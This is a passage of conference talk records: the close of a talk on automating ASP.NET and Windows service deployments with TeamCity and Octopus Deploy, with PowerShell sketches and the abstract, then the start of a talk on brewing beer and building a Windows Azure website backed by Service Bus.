feed, to end up in Visual Studio when I'm trying to get packages and stuff. And I catch errors and exit with one if anything goes wrong. If you need to combine TeamCity or Octopus Deploy with MSDeploy, say that your production environment has a rule that it only accepts MSDeploy packages, then you are able to, in your build process, create an MSDeploy package as well as the Octopus package, and you can deploy the package that you would like. So we can still compile once, and package the compiled website structure into different packages. Then you just have to build up the parameter string, which uses a sync with contentPath and package, and they use their own config transformations. That's important to know, because MSDeploy will not run your regular config transforms. Then you have the deploy PowerShell script that you saw before. That PowerShell script just sets a service name and service executable. It doesn't infer this, because it might be a DLL. In this case it's not. I've created a method, Install-WebApiService, which looks a little bit like this. It tries to get the service. It checks if the service exists in advance.
If the service does not exist, then it will get the .NET framework directory, it will create the InstallUtil path, or command to execute, and it will install it. If the service exists, it will stop the service and reconfigure the binary path using the sc tool instead. When that's completed, you get the port, and since this is a web service, no, a Windows service which wants to accept web requests. This is done automatically by IIS of course, but since I don't have the app pool rights and stuff, I have to set the URL ACL myself. That's what the set user rights method does. I give NT AUTHORITY\NETWORK SERVICE the right to accept all the requests on this given port. The get framework directory is a really simple one. It's just a one-liner. It's very nice to have because it will always get the current .NET framework directory. Then you use the URL format that the URL ACL needs. Then you try to get the current URL ACLs. If it exists, then you don't have to add the permissions. If it doesn't exist, then you will use the netsh command and add the URL ACL for the user to the URL. This deploy, oh, then you also have the get port. It uses another way of reading the XML file. It finds all the add elements in the app settings and enumerates through them. It tries to find the one named port and sets the port. If it's not found, it just returns the default port. This DeployUtil.ps1 also, I don't have to show that now, but it also contains methods for undoing all these steps, for removing the security rights, for uninstalling the service. All of the scripts shown or being referenced will be available; I will add them to another Git repository on my GitHub. Both the website and the web service are available at GitHub. As I said, if you want to test this environment for yourself, you can do that. You can get all of the three virtual machines and go through the things yourself. Let's try to see if it's still disconnected from the internet now. No, still no connection to the internet. There. Okay. I will try to, look, I can finish the presentation before trying to demonstrate the build and deployment process. So how to get started doing this? Usually, you cannot just implement this all at once. If you are in a greenfield project or don't have a complex deployment routine, then you probably can just go on and automate everything at once. Most often, that's not the case and you will have to do this manually, or partially manually, step by step. The way you do this is that you first create the environments and projects that you will need, and add all the automated build steps that you can do, like maybe copying files from one server to another. You also have some different deploy steps that make this a little bit easier. You can send emails. You can have a manual intervention required step. You will add one of these for all the different manual tasks. So even by creating a deployment process with only manual tasks, you will have a reliable, repeatable deployment process, even though it's not automated. One of the biggest sources of error in the deployment process is when you do it manually and forget a step, or do things in the wrong order. So, note that if you don't have access to your deployment or one of the environments, you can run more than one Tentacle on the server, just not as a service. You will have to start them manually. But then you can simulate having a production environment and put all the manual steps there.
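Stepping back to the Install-WebApiService method described above, the flow he outlines (check whether the service exists, install it with InstallUtil or repoint it with sc.exe, then reserve the URL for the service account) can be sketched roughly as follows. The function and parameter names are made up here and the error handling is simplified, so this is an illustration of the idea rather than the actual script from his repository.

```powershell
# Illustrative sketch of the service install flow - names are made up.
function Get-FrameworkDirectory {
    # The "one-liner": ask the runtime where the current .NET framework lives.
    [System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory()
}

function Install-WebApiService {
    param(
        [string]$ServiceName,
        [string]$ServiceExecutable,
        [int]$Port
    )

    $service = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue
    if ($service -eq $null) {
        # Fresh install: run InstallUtil from the current framework directory.
        $installUtil = Join-Path (Get-FrameworkDirectory) 'InstallUtil.exe'
        & $installUtil $ServiceExecutable
    }
    else {
        # Already installed: stop it and repoint the binary path with sc.exe.
        Stop-Service -Name $ServiceName
        & sc.exe config $ServiceName binPath= $ServiceExecutable
    }

    # Reserve the URL for the service account so it can listen without admin rights.
    $url = "http://+:$Port/"
    $existing = & netsh http show urlacl url=$url
    if (-not ($existing -match [regex]::Escape($url))) {
        & netsh http add urlacl url=$url user="NT AUTHORITY\NETWORK SERVICE"
    }
}
```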
So when you're deploying, you can tick off or click proceed for each step that you want. And you also have ways to connect the issue tracker. In Team City, you have, in the settings in Team City, you have the issue tracker. You can connect things like JIRA, bug track, and one more, I think, very easy. Then you can also integrate the other ways. So you can get Team City built in the status in, for instance, JIRA. So you say here, see here. If you want to connect your issue tracker and it sees that you have an issue key in your checking comments, it will automatically associate it and add it to the build notes. And that was the presentation part of the process. And now let's see if we are lucky with trying to get the deployment or the machines working here. Does anybody have any questions, meanwhile? So we'll try to add a new network bridge with the cable. As I said, there were a lot of slides here and they're all available at slideshare. I will add a Google plus post with the links to the slides, the links to the two repositories, and the links to the scripts that I've told you. And I will also create, if you are not able to copy the entire set of virtual machines after the talk now, I will add torrent for it as well and host it for at least a week or two. So you can download and you can test everything you have seen here in the talk for yourself. Let's see if we are able to go there. So are we having, we're not having any problems here. And we probably need to enable and disable. That's the downside of having to rely on an internet connection for your demo. We see, oh, it's a home network. There's only nice people here. Now can we get somewhere? Yeah. So now this machine is up running. That means we should be able to load the team city build server. And this problem should go away. So, try the Octopus server. Here you can see the slides. Oh, and there we are up and running. Nice. So, that means we can start. It seems like Octopus deploy didn't like very much to be killed like that. So if we just go a little bit down. Oh, yeah, we have to go to the here and we do serve. Open the services and restart. And restart the Octopus service. The Octopus service and oh, it's not even started. It stopped when it started. Try again. Yeah, there we have it. And now we can actually run the deployment part. So, we will log in as a developer first. And here you can see my project. It's the IIS one I'm going to use now. Just have to see that this is disabled. I will have. The one thing about Octopus deploy is that it's free to use for one project. So if you're going to demonstrate two projects, you will have to disable the one you're not showing at the moment. So, and I will go and disable the service here. Now everything should be okay for starting a deployment. So we take the web and we pretend that we have done a change to the source code. And we start the build as we can go and see the build is running. It usually doesn't take that much because I didn't want to add a lot of the code quality stuff. TeamCity has a lot of code quality steps that you can include very, very easily. If you go to build steps and you choose to add a build step, you have things like FX cop. You have inspections and you have duplicates finder, for instance, which are very easy to just add to your project to get some more quality assurance. If we go back to these projects now, we'll probably be, oh, it's running now. Almost complete with the build process. And then when this ticks off, the integration build will start. 
The integration build will then create a new release here. You can see that the test environment, we, oh, we're not running the test environment. The build environment is up and running. You can see that we are running 10.025. You can also, oh, you don't need the service. So here you see it starting to create the octopus release. If we go for releases now or for an overview, we should see that the development environment will start giving notice that it's being deployed. And it's about halfway through. So. Oh, there we have it. You see that 10.126 has been started deploying. And it was a success. All the steps were finished. If you would like to take a look at it, then you can see all the outputs. You see the XML transforms are being done. You see that it transforms from the properties. And you get the entire content back. Now we would like to promote this to the test environment. That's cool. But I'm logged in as developer, so I'm not allowed to do that. So I can log out and log back in as a tester. Now we will have to have the test machine up and running as well. If I remember correctly, it wasn't up and running a second ago. So we will. Oh, yeah. Because it restarted. And I'm using, I'm not using server OSS on these machines. I'm using the free Windows 7 image you can download yourself to meant for testing older versions of Internet Explorer. So it has, I've activated it. It has a 90-day license. So it's free to use and not giving away illegal software. Yeah, so we go for the test. Okay. Does it have Internet connectivity? Or do we have to play with the, yeah, we think we have to play with the network settings here as well. We can do this for production at the same time though. We log in. The password for all of these are password 1 to log in with a big P. It also will come up as password hint if you type the wrong. Now we should be up and running, I think. So, oh, yeah. We have a home network. We got to choose this. And we cancel this. So now we will get connected. Oh, yeah. And there our test environment should be up and running. And we should see that, oh, that was a build. And this is the test. This is the API. Oh, it's running. When we get this up and running, we can start the push over. So if you go into the project here, we can see the different versions in different environments. You can see a project activity here, which is queued deployment, which requested deployment. You can also have the, take a look at all the steps, the variables. When you set up, for instance, the manual step, as you saw, you don't have very little to actually, well, enter. You only have the approval group and the environment. Oh, there we are up and running. Now we can go to this deployment and we can promote this to the test environment. The only environment we're allowed to deploy. And I deploy this. You can see the current version is 25. And I'll just fix the network thing on the production server meanwhile. Oh, it seems like this is up and running already. Kid it? So now it publishes the website. And when it has done that, it stops. It runs the smoke test. Oh, it's not completely up yet. And soon it's our turn. There. Now the build is in the manual step mode. If you go back and take a look, you see that this build is paused. It will not get further. I chose this as the way to mark user acceptance test failures or successes. So if you do not approve this, you will get a failed build, a failed deployment. What you will do is go to this URL and verify all new behavior. 
That means that this version number should change. And it did. So we can proceed. Oh, that was the one. It doesn't like the host network changing that much. And we cancel. And we can't do it. And there, we should be able to go see if we can get the current version up and running first. So now we have the 26 version deployed to development and test. It will be the same. Oh, here we also have it in release in production, as you can see. And now we can promote this release again. We can promote it to, well, we have to log in as an administrator to be able to promote to production. The password is simple. It's the same for all of the Octopus users. It's password one, the same as you log into the computer with. Now you can go here and promote this to, now we have all environments. You say production. And we want to deploy that release. And it will do the same thing again. The same process. But now again, excluding step number four, the manual intervention. Maybe you would want to add a manual intervention step there as well. Or maybe you want to add a mail as the next step, which sends out a mail to a mailbox or a common user address. And doing the same thing for the Windows service is, well, the same. If we go to one of the machines, we can open the services, and we can open the IIS manager, so you can see how they are installed on this machine. We can also take a look at how Octopus uses its packages. You have the Octopus folder here, and then an applications subfolder. This is the environment, test. So it has one test environment. And this is the name of the website. You have one folder for each of the projects, and you have one folder for each of the releases that has been released there. You can set different retention policies: to keep all versions forever, to keep just the last five versions, or the last week's versions, or something like that. So we can always go back a week, but not farther than that. And to switch from one of these to the other, you just make a redeployment of that release. And since it detects that it is already installed, it just makes the switch. And that's how you actually do rollback. And here you can see it has all the configuration files, but the web.config has been transformed. And if you go here, you will have the application pools. You have the NDC demo test app pool, which I created with a script. It would have used the default web application app pool if I didn't have this PowerShell script in advance. And you have the demo test website. In the services, you have this service with the service name and the description that I chose. You can see that it's currently 25, that's the deployed version. And you see the service name, HttpApiService. And now we should have deployed this all the way to production. I can disable this. And if you would like to watch, we can do the same thing with the service. But this will be the last thing that I'll do. So we will start the service build. Now we can also go into the integration process and see the results of the integration, or this automated acceptance test. This step is a little bit faster because I removed the unit tests step here. So if we go for the integration build here, and it should have started a build, there we have one, we can go to the build log. And we can tail it. Now we can see it's finding the project, it's handshaking with the server, creating the release, and now deploying it.
So the release 26 has already started. And you can see, oh, it's already deployed. So this one should have environment development and the version 26. If we go to the test and the production. Now I'm logged in as administrators and I'm automatically allowed to deploy this. But then again, now you can see, oh, it's in the correct environment development. This is the small so called automated acceptance test I wrote in PowerShell and it has the correct build number. So my integration build is okay. Let me see if we could have the test. And that will be interesting. We will release this to test. And the deploy to test, it also has the manual stage. It also has the same deploy to the production as you've seen before. But now there's nothing, the rest of the process, nothing new, it's actually the same. So that concludes the talk. And thank you for coming.
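As a closing reference, the packaging and publishing scripts he mentions sharing are only shown briefly during the talk, so here is a rough sketch of the shape he describes for them: load an XML configuration file, call nuget.exe pack, then add the feed as a source, push the package and remove the source again. The configuration file layout, feed URL and credentials are invented placeholders, so treat this purely as an outline, not the script from his repository.

```powershell
# Outline of the pack-and-publish flow - file names, XML layout and URLs are made up.
param(
    [string]$ContentDirectory,
    [string]$Version
)

try {
    # Load the package configuration file into an XML object.
    [xml]$config = Get-Content .\package-config.xml
    $packageId = $config.package.id

    # Create the package from the nuspec named after the configuration.
    & .\tools\nuget.exe pack ".\$packageId.nuspec" -BasePath $ContentDirectory -OutputDirectory .\packages -Version $Version
    if ($LASTEXITCODE -ne 0) { throw "nuget pack failed" }

    # Publish: add the feed as a source, push, then remove the source again
    # so it does not linger in Visual Studio afterwards.
    $feed = 'http://feedserver/nuget'
    & .\tools\nuget.exe sources add -Name TempFeed -Source $feed -UserName build -Password build
    & .\tools\nuget.exe push ".\packages\$packageId.$Version.nupkg" -Source $feed -ApiKey placeholder
    if ($LASTEXITCODE -ne 0) { throw "nuget push failed" }
    & .\tools\nuget.exe sources remove -Name TempFeed
}
catch {
    Write-Error $_
    exit 1    # signal the build or release process that this blew up
}
```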
|
Many of us have one or more manual steps in our deploy and release processes. This leads to a lot of time spent waiting for the right people to do the job. Also, errors often occur due to steps forgotten or done incorrectly. This often leads to high walls between the testers, IT-ops and the developers. This talk will start out with some general continuous delivery theory, the whys, where you'll get to know the actual benefits of applying continuous delivery and the arguments you need to be allowed to spend time on it. Then we will move over to the hows, by demonstrating how you can use TeamCity and OctopusDeploy to configure automated builds and one-click deployment of both an ASP.NET website and a Windows service, and how you can migrate your current manual process into an automated one. Along the way, we will be discussing how OctopusDeploy chooses to solve specific problems, and other ways you might handle those issues.
|
10.5446/51469 (DOI)
|
Alright. Good afternoon everyone. Welcome to day one of NDC, an awesome conference I think. I spoke here two years ago and it's like the only conference I really recommend people go to, so I'm really happy to be speaking here again. Maybe a bit of a strange topic for a technical conference. I'm going to talk about brewing beer with Windows Azure, which is kind of fun because brewing beer is fun, drinking beer is fun, Windows Azure is quite fun, so I think it's a perfect match to speak about. So, anyone using Windows Azure at the moment? Okay, cool. A couple. Anyone brewing beer at the moment? Well, not at the moment, but at home. Nice. A lot of people. So please don't judge me on my... I'm like a new home brewer. I've been doing this for one year right now, so I still make mistakes and so on. So don't shoot me if I tell anything wrong about brewing beer there. Also don't shoot me if I tell anything wrong about Windows Azure. But anyway, this talk is basically a collection of several little talks. So I'm going to first talk about brewing beer, how you do this, what it's all about, what you have to do. You will see that you will be cleaning quite a lot during the process of brewing beer. And at some stage, I think that was when, well, there are actually two stories there. But I think I came up with the session title for this one while being slightly drunk, which is one of the stories. And I went home and it was like, awesome title, brewing beer with Windows Azure. Yes, but what am I going to talk about? So I came up with this concept of having several smaller talks, some on brewing beer, some on what is Windows Azure. A little bit about web APIs, a little bit about how you can secure them. So I think there are quite a lot of topics that you will see throughout this talk. So who am I? I'm Maarten Balliauw. I'm a technical evangelist with JetBrains, hence this nice orange t-shirt. I run the user group in Belgium for Windows Azure, the Windows Azure user group, AZUG. Historically and even still, my focus has been everything web related. So Windows Azure, ASP.NET MVC, Web API, SignalR and so on. I'm also an MVP in Windows Azure. I blog about all those topics. You can find me on Twitter there as well. And just if you want to buy me a beer, you can either buy me a beer after the session, or you can just buy the book, which buys me a beer in turn, or at least half a beer. Because book writing is not that lucrative, to be honest. But anyway, setting expectations. What this talk is not going to be about, or what this talk is not going to be: not something like this. We're also not going to do something like this, which would be interesting, but still, we still want this building to remain. Also, this is not what we're going to do. Maybe for those who are joining us at the boat cruise this afternoon or this evening, that might be the end result of the boat cruise, but that's not what we're going to do during this session. What are we going to do? Well, brewing beer. I have several minutes about just brewing beer, so you will learn nothing about ASP.NET, nothing about Windows Azure there, but you will go home thinking, yes, I want to brew my own beer. Then we'll have a look at BrewBuddy, something I came up with for the sake of this talk. Windows Azure websites, Windows Azure service bus, Windows Azure access control, basically a lot of technologies during the talk. And also, we need an API and maybe some questions and answers afterwards. So brewing beer. How do you start brewing beer?
Well, how did I get started? Who convinced me into brewing beer? Well, that was this guy. I don't know if you know him, but he's been one of the former hosts of the Cloud Cover Show, which is an online show on Channel 9 where you can basically learn a lot about Windows Azure. This is Wade Wegner. And one of the nice things about being an MVP is that you get to go to the MVP summit every year. So you fly out to Seattle, you have a couple of beers, you see what's coming in all the products and so on. And at the MVP summit in 2011, I was talking with Wade Wegner and he was a home brewer. And I was like, yeah, yeah, yeah, whatever. An American brewing beer, that cannot be good, right? So last year at the MVP summit, I went there again and Wade started talking about that again, and I was tasting some of the American beers and I was like, if that's what they do in the US, I might as well just start brewing myself because it can't get worse, right? So I started brewing my beer there. So how do you brew beer? Well, first of all, you have to buy some stuff to start working with. So what I did was I went Googling and I found this nice local company in Belgium who had a starter kit, which you can find throughout the internet. You can buy this stuff in the UK. You can buy it in Norway probably as well. You just go there, you buy a starter kit with some kettles, with some things for measuring alcohol levels and so on. You just buy that. That's more than enough to start with, and you will see along the way, if you start liking it, you will go beyond this kit. But it's a great way to start brewing. Now, the process of brewing is quite simple. You have to get your kettles clean. So the last thing you want to have is any bacteria or something like that in your beer, because fermentation may fail. There may be bad bacteria in there starting to multiply and you get a very bad taste in the beer, which is probably how the Dutch guys brew their beer. But anyway, the next thing you do is add and boil your ingredients. So you have to add malt, you have to add hops, you have to add whatever you want to pour in there. You can add herbs as well. There's a couple of ways you can start brewing. One of the ways is you buy this massive tin can containing a liquid-ish goo, which is basically something like syrup. You pour it into a kettle, you add boiling water and that's the brewing. Which is interesting to start with, but it's just basically opening a can and pouring it in your kettle, which is not that fun to do. So a second way of brewing beer is using malt extracts, which are those bags you see on the picture. You buy those bags, you put those in the kettle, you start boiling them and you go on. Then the real way of brewing beer is just buying the grains, making sure you mash them, making sure you extract the sugars from those and boil those in your kettle. Now I am currently at the malt stage because my wife doesn't really like me bringing in too much of those big brown sacks of grain into the kitchen. Next, after brewing this, or after cooking all this, you have to put it in the brewing kettle and you get something like this. It looks, the color is beer-ish, but it's not really beer. Actually if you taste it, it's just like very, very sweet water. You would think, hmm, not that interesting. By the way, during the cooking, that's also not the most interesting time to be around your kettle because it smells a little bit.
So you do this, you put all that in a kettle, you add yeast, which can be liquid yeast, which can be something you, basically if you drink a beer, there's always some yeast residual in there. You can start multiplying that as well and add that to your beer. You can add dry yeast, you can add liquid yeast and so on. So you add it in there and then you get to rinse all your material while the beer is fermenting. Brewing is cleaning. So this is something you will do a lot. Actually, brewing 25 liters takes about three hours, three hours and a half. Half an hour of that time is actual brewing. Those other three hours are just cleaning your stuff. So if you think brewing beer is romantic, something you want to really do because of the fun of that, don't go there. It's a lot of cleaning, seriously. Then after cleaning and after you put aside your beer, well, at least what's becoming your beer, you have to wait for the fermentation to complete. So basically what's happening is you have this very sweet sort of water. By adding the yeast, the yeast will eat all the sugars in there. It will convert all those sugars into alcohol and a little bit of smell again. And you have to wait for fermentation to complete. Typically, it takes about a week. It may take a little bit longer, maybe a bit shorter. But typically about a week before your beer actually contains alcohol and starts tasting a little bit like beer. Then the thing I typically do is you don't have to do it. At this stage, you can actually put it on the bottle and put it aside and have it age a little bit to have a nicer taste. But what I typically do because I don't have stuff to filter my beer, I typically put it aside for another week in another kettle so the liquid can become a little bit clearer. Also, this is the residual in your first kettle you have put aside after the fermentation. So you see you don't really want this stuff in your bottles because otherwise you will drink this afterwards. So I typically put it all at a site and of course again you have to clean and wait another week before you can actually do something else with your beer. But after a week, after that you can start bottling. So you just fill up your bottles and you think, yes, I have my own beer. Like this. The difficult part at that stage is you have to wait for the beer to age. About six weeks at least before the taste actually starts being good and before carbonation will occur. So if you put the beer in the bottle, there's still some sugars in there, there's still some yeast in there and you want the gas of the yeast which it generates to become CO2, basically to become the bubbles in your beer. So you have to wait a couple of weeks before that happens or a couple of days before that happens or otherwise you have this stale, non-phomy, non-sparkling beer basically. So those six weeks are the hardest process of the entire brewing thingy. It takes a while, six weeks is long and typically there's always some bottles which don't survive that long because you want to taste the end result, you want to make sure that you actually brewed something which may be nice to consume afterwards. So those six weeks are really difficult. But after six weeks you can go into this. Now a good question may be what does this all have to do with Windows Azure? Well to be honest not a lot but I thought it may be interesting to combine brewing beer with Windows Azure. So that was what I did. 
And I came up with this brilliant idea of building a website called brewbody.net which is like the GitHub for developers but then the brew hub for beer drinkers or beer brewers. So social brewing. See what this website does is and I can actually show you in my browser. It's this one. Let's just sign out. So you go to the website, you see it's social brewing blah blah blah. You can find some public recipes for beer on there. You can see there's some there, there's some test recipes as well. I have my IPA which I brewed last week on there as well. You can see the details, I can see all the ingredients, I can see all the steps I have to do to brew this thing. Next thing I can do is create an account on this website. So I can create an account and log in and I can manage my own recipes. So I have a couple in there. I can edit my recipe, I can add markdown syntax in there and so on. And I can also choose if I want to publish this recipe in the public gallery or not. So if I don't want to share my recipe with anyone that's perfectly fine for this website. You just put it on there and we don't show it to anyone. If you make it public, people will see it in the public recipe gallery. Next thing you have is your brews. So you can have one recipe but maybe you want to brew this a couple of times. So here you see I brewed this RushFar which is by the way a nice Belgian beer. I've brewed it quite a couple of times and I can see the details of my brew. So you can see this is actually a brew for a specific recipe. You can see all the ingredients and so on. And you can also see what happens during the brew. This one doesn't have a lot of information. But if we look at this one for example, you will see that we get a temperature profile there which is not the ideal temperature profile for fermentation of your typical beer but it's just a demo profile which is in there. But the idea is that during the fermentation you actually have to have quite a stable temperature. So for the yeast to do its work it has to have a very stable temperature. It's even more difficult to brew things like pills for example. You have to have a very low temperature there so you actually have to cool your liquids which is kind of difficult to do. And what this thing does is it allows you to manage your recipes, it allows you to manage your brews and it allows you to keep track of the fermentation temperature while your beer is fermenting. Which is a nice thing because you can just put it at home. You can just have the fermentation going on and then you can use this website from your work location for example to monitor what's going on. And if you see there's a sudden spike in there, you may want to drive home. Don't think your boss will like it but anyway. So you get those things, you get the public recipes, you can manage your own brews, you can copy brews and so on and link your own temperature sensor to those things. Which is interesting because it's kind of difficult to do all that. The website is kind of simple having a database is kind of simple but combining all those components you actually need a couple of things. So on Windows Azure I have a public website running on Windows Azure website so that's the thing I just showed you. You can use the website there, you can log in there, you can make use of the website, add your recipes, add your brews, etc. Under need that I have a SQL database. So I'm using SQL Azure or Windows Azure SQL database depending how you want to call this nowadays. 
Just storing all the recipes, storing all the user data, storing all the brews, storing all the statistics on the fermentation temperature. Next thing you have is some sort of a sensor and in my case I just wrote a simple WinForms application which connects to a USB sensor and then pulls in the temperature. Now you have to get that sensor data into your database somehow. How would you do this? Well I chose to use the service bus, Windows Azure service bus to gather all that data, basically queue up all that data, crunch the data and then put it in the database. So the data crunching is done by a Windows Azure worker role. So I have a sensor posting to a service bus topic, service bus is consumed by a worker role, worker role is putting that data in my database which I can then consume through the website. Now why this worker role? Why am I not just using the sensor data and putting it into my database? Well I want to have some quality control there. If for some reason a temperature sensor goes wild and goes like 50 degrees and beyond, probably the sensor is broken or your house is on fire. So I want to clean that data out. Also I don't want to have an API on top of my database to get all that data directly. Maybe some sensors may be sending new data every couple of seconds and that's quite a lot of data to put in your SQL Azure database and I don't want that. So what this worker role is doing is it's catching all that data from the service bus topic and making sure it aggregates the data and creates an average over 15 minutes. So what you see in the temperature profile on the website if you go there is an average over 15 minutes. So you don't see the real time data, it's just an average of the last 15 minutes that you see there. And that's done by this worker role thingy. So why Windows Azure websites? Well it's a typical scale fast fail fast scenario. You can just come up with an idea, deploy it to Windows Azure websites and have it there for a very, very low price. You can test your idea. If people like it and people start using it you might as well scale up afterwards. But you can just test your idea quite simple, quite easily and quite cheap there. So I decided to test proofbody.net on Windows Azure websites and the fun fact is it's only a demo site I created but the fun fact is I have two users making use of this website. And I'm actually planning on retiring this talk because I've given it quite a lot of times and so I will have to inform those two guys to look for a different solution there. Sorry if that's someone in the audience, sorry to disappoint you. So Windows Azure websites, it allows you to build your application with whatever language you want basically. Is it ASP.net fine? You want to do Node.js perfectly fine? Do you want to do PHP, Python, Ruby or something else? Maybe even C++ and writing your own CGI handler. You can do that on Windows Azure websites. You can deploy quite fast as well. There's a couple of ways you can deploy. You can use web deploy, you can use FTP to deploy your websites and you can also just send your source code to Windows Azure which will then make a build of your website and put it on Windows Azure websites. You can start for free, okay, not for production use but you can test your idea, you can develop your idea and make sure it's actually working. And then afterwards you can just scale up and scale out. So you can scale up to a bigger instance but you can also scale out to multiple instances there. So that's what's happening. 
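The 15-minute averaging the worker role does is straightforward to sketch. The real worker is .NET code reading from the Service Bus topic, but the bucketing idea, shown here in PowerShell to keep all the examples in one language and with invented property names, is simply: round each reading down to the start of its 15-minute window and average per window.

```powershell
# Sketch: average temperature readings per 15-minute window (property names are made up).
$readings = @(
    [pscustomobject]@{ Time = Get-Date '2013-06-12 10:01'; Celsius = 19.2 },
    [pscustomobject]@{ Time = Get-Date '2013-06-12 10:07'; Celsius = 19.6 },
    [pscustomobject]@{ Time = Get-Date '2013-06-12 10:18'; Celsius = 20.1 }
)

$readings |
    Group-Object {
        # Round each timestamp down to the start of its 15-minute window.
        $t = $_.Time
        $t.Date.AddMinutes([math]::Floor(($t.Hour * 60 + $t.Minute) / 15) * 15)
    } |
    ForEach-Object {
        [pscustomobject]@{
            WindowStart    = $_.Name
            AverageCelsius = ($_.Group | Measure-Object Celsius -Average).Average
        }
    }
```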
Basically Windows Azure website is high density web hosting. So the first time you go there and you deploy your website in a standard model, your website is actually just a website sitting on a server where a ton of other websites are also sitting. So you see this nice little guy smiling there. If you scale out what will happen is on some of those shared instances, they use one of those instances to have two servers of your website. But still that's two servers so you have some load balancing there but two shared servers. There's other people on those servers that you are using as well. Next step with Windows Azure would be to go to a reserved instance and basically what you would do is move your websites to one instance that's yours. So actually get an entire server for your website there. So you already see you can start really small on a shared environment and whenever you see traffic coming in, you can scale out to a reserved instance and have multiple websites of your own running on that reserved instance but only your websites, not the websites other people are publishing there. You can scale out again, you can make it 10 instances, you can make it 20, you can make them 8 core machines and so on. So you can keep on growing on this Windows Azure websites platform. So it's a perfect ramp up. You can start really small, you can just put your stuff there. It's cheap, you can actually start for free. Then when you see users coming in, you go to one shared instance, maybe two shared instances, maybe four. Whenever you see there's really a lot of traffic coming in, just scale out to reserved instance, maybe multiple reserved instances and just keep growing. I hope if you have to go to reserved instance that you have actually have money coming in, which is something I sadly did not do with this Brubali website but still you should have some income if you want to scale out. And then if you hit this limit of Windows Azure website, you can always grow up and make it a platform as a service approach or infrastructure as a service where you actually have your own web service for running this thing. So anyone used Windows Azure websites before? Anyone not used Windows Azure websites before? Still hence, which is a good thing in the afternoon after lunch and so on. So I'll give you a quick demo on how you can make use of Windows Azure websites. So if you go to the portal, there's actually an interesting thing. You can host 10 websites per data center for free. So you can basically experiment quite a lot and have a lot of ideas which you can test on the internet. So I can create a new website there. Let's say I want to create a new one. I can quickly create it and give it a name and you see one which still exists. I can select the data center there. So let's go with Northern Europe and create a website. It takes a couple of seconds and what will happen is you suddenly have a place where you can deploy your website. So it shouldn't be too long anymore. So this thing created an empty website. Something where I can deploy my own code into. If you don't want that, for example, if you want to have a WordPress blog, for example, you can just create a new website from gallery and you get a list of a lot of apps that are supported on Windows Azure websites. Not all apps are in there, but it's quite a lot and it's really easy to get started. So for example, my father wanted to start his blog. I just created a new website, selected WordPress and he has his blog in like five minutes. 
And I told him, yes, I spent the entire afternoon doing this. You have to buy me a beer for that. So it takes just a few seconds. So our first website we created, you get a host name there. If you now go to ndce1.azurewebsites.net, you should be seeing this nice little page stating that my website has been created. And from now on I can start working, create my own application, deploy it there and so on. So how can I deploy while I can use FTP? I can download a published profile which I can use web deploy with. So from Visual Studio I can just select my website, right click it, say publish website and we use web deploy for doing that. I can add a database and so on. If I don't want to deploy my compiled solution, I can also say that I want to deploy from source control in which I can select TFS, in which I can select GitHub, in which I can select Dropbox, Codeplex or whatever repository you have online that you might want to use to build your own websites. Next thing you can do is monitor your websites. So you can see the CPU time, you can see the incoming data traffic, outgoing data traffic, server errors, a lot of information in there. You can also configure my website. So I can run on.NET 3.5, 4.5, turn off PHP or upgrade to a better version of PHP. You can add my custom domain name, can add SSL, I can turn on or turn off logging. I may be interested in just warnings and errors, but I may be interested in very verbose information. I can select that, click save and literally seconds later this website has been updated and is now logging my data coming in out to the websites. So quite easy. If I want to scale afterwards, I go to the scale tab, I can go to a shared instance, I can select a number of shared instances, I can go to reserved, I can select large instance, make it 10, save and again seconds later my website is running on 10 servers with 4 cores in there. So it's really easy to get started, it's really easy to grow your website and grow your application by using this thing. And if you no longer need it, you don't have a contract there so you can just delete the website and the website is gone, you're not paying anymore and your idea is also gone from the internet. So Windows Azure websites is kind of interesting to do all that with, but let's talk about connecting those temperature sensors to the service bus first. So how would you connect sensors to your application, get our data like temperature, get our data like I don't know whatever you want to get our data from in sensors? Well, a good candidate for doing that is Windows Azure service bus, why? We'll come to that in a few seconds. So Windows Azure service bus comes with two main features, one of the interesting features there is the service bus relay, which is this one. Basically what you will have is you have a client, you have a server and they cannot communicate with each other directly. There's firewalls in there, there's grumpy system administrators that don't want to open that firewall, so you cannot connect this client and the server directly with each other. 
So what you can do then is just make use of the Windows Azure service bus relay, have outgoing connections made on both sides, so the client connects to Windows Azure service bus, the server connects to Windows Azure service bus and service bus will start providing a relay there, which is a very interesting thing if you're doing development and you have a very restrictive environment where you cannot put a WCF service for example on the internet from within that network while you can use Windows Azure service bus relay to do that. But that's not how you would connect sensors, right? A second big feature in the service bus is Q's topics and subscriptions. So basically what you can do is you can have your sensor posting data to the service bus. You don't see any processing going on this slide yet, so what you're doing is just gathering all the data, collecting all the data in the service bus, posting all that data into the service bus and just making it a long queue of sensor data in there. What you can then do is fire up one of your worker roles or just a couple, all making use of this queue. So the sensor posts data into the queue, the worker pulls the data out of the queue, processes it and maybe posts it into a database. The interesting thing of working this way with the sensor data is that you have a very loose coupling between the sensors and your actual service. If no workers are running, the data will still come in. Sensors will not see that there's no workers running. Sensors can still put their data on this queue without any interruptions. So no one complains at this time if this happens on a Sunday morning and all your workers go down, no one will call you because data is still being pushed and nobody will see anything is happening. The only thing they will see is that their data is not being processed quickly enough. If I only have one and I have a million sensors, maybe my data is not being processed fast enough and maybe the data will take half an hour to be processed by a worker. It may happen but still my web server or my web service is not going down. My service is still running, I still get all those messages in and something gets processed on the other side. If I then scale out, I don't have to think about which sensor should connect to which WCF service or something like that. No, I just keep pushing that data into the queue and the workers will just pull the data out of this queue. So I can easily scale as well. If all of a sudden everyone starts brewing beer and everyone starts adding sensors to my brewbuddy.net websites, I can simply choose to scale out my workers and I don't have to change anything else. My service layer stays the same, my sensors just push everything to the service bus and I don't have to do anything to have multiple servers processing that data. So workers can scale independently. If I have one worker, that's perfectly fine. Data may stay longer in the queue but still the queue is running and all the sensors are running their data through. I can add 10 workers and data will go through quite fast but I can scale them independently from the source. Imagine you are building this thing with your own API. Imagine you have sensors and your own server where the sensors push their data to. If you have more sensors there, you would have to have more servers running this service, right? Because otherwise if you have a lot of sensors and only one web server accepting all that data, that web server will crash, probably. 
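As a rough sketch of that queueing pattern with the .NET Service Bus client library (the WindowsAzure.ServiceBus NuGet package): the connection string, topic and subscription names below are placeholders, not values from the talk.

    using Microsoft.ServiceBus.Messaging;

    // Placeholder connection string for the namespace.
    var connectionString = "Endpoint=sb://yournamespace.servicebus.windows.net/;SharedSecretIssuer=owner;SharedSecretValue=...";

    // Sensor side: fire-and-forget a reading onto the topic; nothing needs to be listening right now.
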